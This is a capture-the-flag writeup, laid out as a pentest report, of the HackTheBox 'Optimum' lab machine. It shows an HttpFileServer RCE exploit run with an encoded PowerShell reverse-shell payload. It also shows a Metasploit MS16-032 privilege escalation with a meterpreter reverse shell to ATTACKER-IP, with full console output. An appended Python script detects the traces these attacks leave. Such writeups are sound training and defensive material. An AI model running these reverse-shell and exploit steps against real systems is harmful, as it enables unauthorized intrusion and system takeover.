Optimum CTF Writeup

This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Optimum CTF from HackTheBox. The writeup takes the form of a pentest report.

Optimum CTF

Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits.

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Executive Summary

Introduction

This document shows the results of a security assessment performed on the Optimum machine (IP: 10.10.10.8). The report provides a comprehensive analysis of the findings, including vulnerability explanations, severity ratings, and steps to reproduce the identified vulnerabilities.

Objective

The assessment sought to identify vulnerabilities that could potentially lead to unauthorized access, data compromise, or privilege escalation. By conducting controlled exploitation scenarios, the assessment aimed to highlight the impact of these vulnerabilities and provide actionable recommendations for remediation.

Requirements

The assessment was conducted with the following requirements in mind:

  • Exploit vulnerabilities to demonstrate potential impact.
  • Assess the effectiveness of access controls and authentication mechanisms.
  • Demonstrate privilege escalation from user-level to root.
  • Provide detailed vulnerability explanations, severity ratings, and remediation recommendations.

High-Level Summary

The assessment uncovered concerning vulnerabilities within the Optimum machine:

  1. CVE-2014-6287 (HttpFileServer RCE) - Severity: High
    • Explanation: Remote Code Execution (RCE) vulnerability identified in HttpFileServer version 2.3.
    • Recommendation: Update to the latest version of HttpFileServer to mitigate the risk.
  2. MS16-032 (Privilege Escalation) - Severity: Extreme
    • Explanation: Privilege escalation vulnerability discovered, allowing potential unauthorized access.
    • Recommendation: Apply the provided Microsoft patch to fix this critical vulnerability.

This high-level summary outlines the vulnerabilities found during the penetration test, along with their respective severity levels. It underscores the importance of promptly addressing and remedying these vulnerabilities to enhance overall system security.

Detailed Findings

Detailed vulnerability explanations, vulnerability fixes, severity ratings, and steps to reproduce the identified vulnerabilities are documented in the "Independent Challenge" section.

Methodology

Behind Security's penetration test followed a comprehensive and structured methodology, incorporating the following key phases:

  1. Reconnaissance: The initial phase involved gathering information about open ports.

  2. Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.

  3. Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.

  4. Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system's security.

  5. Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.

Color Legend

Console color legend:

Standard console text
Commands entered by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Independent Challenge - 10.10.10.8

export IP=10.10.10.8

Service Enumeration

IP Address      Ports Open
10.10.10.8      TCP: 80

Command: nmap -sC -sV -T4 -vv -p- 10.10.10.8

Initial Access - HttpFileServer 2.3 RCE

Vulnerability Explanation: The vulnerability is tracked as CVE-2014-6287, a remote code execution (RCE) vulnerability in HttpFileServer version 2.3.

Vulnerability Fix: The vendor released an updated version of HttpFileServer that patches the RCE vulnerability. Upgrade to the latest version to mitigate the risk.

Severity: High

Steps to Reproduce the Attack:

  1. Download this public exploit.
  2. Go to revshells.com, select PowerShell #3 (Base64), change the IP address at the top to your VPN IP address, and copy the generated payload.
  3. Run the following command to obtain a foothold on the machine (replacing the string after the -e with your respective base64 encoded payload from revshells.com): python3 49125.py 10.10.10.8 80 "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOA{abbreviated}GwAbwBzAGUAKAApAA=="
Proof of Exploitation: REDACTED user.txt

Post-Exploitation

LPE to SYSTEM

Vulnerability Explanation: After generating a malicious Windows executable to establish a meterpreter session on the victim, Behind Security ran the Metasploit local exploit suggester module (post/multi/recon/local_exploit_suggester) and identified that the machine is vulnerable to MS16-032, a privilege escalation vulnerability.

Vulnerability Fix: Microsoft has issued a patch to fix this known issue. You can learn more about the patch and its details on Microsoft's official website.

Severity: Extreme

Steps to Reproduce the Attack: The attacker needs to have a meterpreter session on the machine.

  1. Background the meterpreter session using the command bg
  2. Run: use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
  3. Configuration and output are provided below.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options 

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process,
                                         none)
   LHOST     192.168.1.10     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST ATTACKER-IP
LHOST => ATTACKER-IP
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on ATTACKER-IP:4444 
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1...
[*] Compressing script contents...
[+] Compressed size: 3745
[*] Executing exploit script...
         __ __ ___ ___   ___     ___ ___ ___ 
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|

                       [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2380

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+         $iD6g = [Ntdll]::NtImpersonateThread($mgn, $mgn, [ref]$p8yG)
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (p8yG:VariablePath) [], Runtim 
   eException
    + FullyQualifiedErrorId : NonExistingVariableReference

[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+     $iD6g = [Advapi32]::DuplicateToken($iF, 2, [ref]$gYZ)
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument

[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

iX7rWHCXEXxPf38Tph4mU5nNNfoW2lnc
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (ATTACKER-IP:4444 -> 10.10.10.8:49210) at 2023-08-12 11:13:08 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] Already running as SYSTEM
Proof of Exploitation: REDACTED root.txt
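As an added defensive example (not part of the original report or of any tool it uses), the following Python script runs detection logic over constructed Sysmon-style process-creation records that mirror the traces both findings leave on the host: the HttpFileServer process spawning PowerShell with a base64-encoded command (initial access), and a 32-bit SysWOW64 PowerShell executing a script written to the user's Temp directory (the behaviour the ms16_032 module reports in the output above). The event records, file paths and the short base64 payload are all constructed for this example.

```python
import base64
import re

# Constructed Sysmon Event ID 1 style records (made up for this example, not taken
# from the report): parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\hfs\hfs.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA=="},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Users\kostas\AppData\Local\Temp\gfJYTJhM.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process"},
]

# PowerShell accepts -e, -ec, -enc and -EncodedCommand for the base64 argument.
ENCODED_RE = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
TEMP_PS1_RE = re.compile(r"(?i)\\AppData\\Local\\Temp\\[^\s\"']+\.ps1")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell encoded-command argument, or None.
    PowerShell encodes the script as base64 over UTF-16LE, so decode it that way."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Return (rule, event_index) pairs for records matching either finding's trace."""
    hits = []
    for i, ev in enumerate(events):
        # Finding 1: a file server process has no business spawning a shell interpreter.
        if basename(ev["parent"]) == "hfs.exe" and basename(ev["image"]) == "powershell.exe":
            hits.append(("hfs_spawned_powershell", i))
        if decode_encoded_command(ev["cmdline"]) is not None:
            hits.append(("encoded_powershell_command", i))
        # Finding 2: the ms16_032 module ran 32-bit (SysWOW64) PowerShell on a script
        # it had just written to the user's Temp directory.
        if "\\syswow64\\" in ev["image"].lower() and TEMP_PS1_RE.search(ev["cmdline"]):
            hits.append(("syswow64_powershell_temp_script", i))
    return hits
```

Decoding the encoded command lets an analyst see the script prefix in the alert instead of an opaque base64 blob; the third record is a benign control that should produce no hits.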

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 


BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.
